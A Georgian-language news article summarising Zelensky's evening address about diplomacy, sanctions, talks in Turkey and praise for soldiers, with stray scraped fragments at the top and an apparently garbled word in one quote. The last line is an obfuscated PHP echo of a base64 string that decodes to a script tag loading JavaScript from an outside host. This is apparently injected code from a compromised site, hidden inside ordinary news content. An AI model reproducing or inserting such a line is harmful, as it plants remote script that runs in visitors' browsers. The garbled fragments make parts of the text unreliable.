celsiusi
ავერსი შნაიდერი
უკრაინის პრეზიდენტმა, ვოლოდიმერ ზელენსკიმ დღის შემაჯამებელ ვიდეომიმართვაში აღნიშნა, რომ მომდევნო კვირა დიპლომატიურად დატვირთული იქნება.
 
ზელენსკის თქმით, ვერცერთი პოლიტიკოსი ვერ შეძლებს, საკუთარ კაბინეტში უკრაინული ინტერესის დამალვას.  
 
"მივმართავ უცხო ქვეყნის პარლამენტის წევრებს და ვეტყვი, რომ წინ, დიპლომატიური კუთხით, ძალიან მნიშვნელოვანი და დაძაბული კვირა გველოდება. ვერცერთი პოლიტიკოსი ვერ შეძლებს თავის კაბინეტში უკრაინული ინტერესების დამალვას. არავის მივცემთ უფლებას, მარიუპოლისა და ჩვენი სხვა ქალაქების შესახებ დაივიწყოს. უკრაინისა და სიკეთის მხარეს და ბოროტების წინააღმდეგ, ყოველდღიურად უფრო და უფრო მეტი ადამიანი დგება."– განაცხადა ზელენსკიმ. 
 
ზელენსკიმ ვიდეომიმართვაში ყურადღება გაამახვილა მოქალაქეების იმ უმცირეს ნაწილზე, ვინც დროებით ოკუპირებულ ტერიტორიებიდან არიან და რუსეთის, მფარველობის ქვეშ ყოფნა არჩიეს. 
 
"იმ ფენომენალურ იდიოტებს, ვინც რუსეთთან თანამშრომლობას ამჯობინებს, მინდა ვუთხრა, რომ რუსები ფეხებზე თავისიანებს იკიდეთამნაბენ და წარმოიდგინეთ, თქვენ რას გიზამენ. მინდა მოგიწოდოთ, დაფიქრდეთ, თუმცა, ფიქრი რომ შეგძლებოდათ, ამ დღეში არ ჩავარდებოდით. 
 
რა თქმა უნდა, რუსეთის წინააღმდეგ ახალ სანქციებზე მუშაობას მომავალ კვირაშიც გავაგრძელებთ, წინ კი მოლაპარაკების კიდევ ახალი რაუნდი გველოდება. რა თქმა უნდა, ჩვენი მიზანია მშვიდობა. როგორც მათ შემოგვითვალეს, უმჯობესი იქნება პირისპირ შეხვედრა თურქეთის ტერიტორიაზე. ცუდი აზრი არაა. დავაკვირდებით, რა მოხდება. მოლაპარაკების მაგიდაზე ჩვენი ურყევი პოზიცია დაფიქსირებულია, ეს არის უკრაინის სუვერენიტეტი, ტერიტორიული მთლიანობა. რა თქმა უნდა, ასევე, უსაფრთხოების გარანტიები და ომის დასრულება. 
 
ჩვენი ჯარისკაცები მტერს გმირულად ებრძვიან. გაოცებული ვარ, როგორ მედგრად და ჭკვიანურად იბრძვიან და მოქმედებენ ბრძოლის ველზე და ეს იმდენად მნიშვნელოვანია, რომ მადლობის თქმაც კი არაა საკმარისი. თუმცა, არ დავიღლები, რომ ისევ და ისევ გითხრათ - დიდი მადლობა თითოეულ თქვენგანს." – აღნიშნა ზელენსკიმ.  
 
738
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");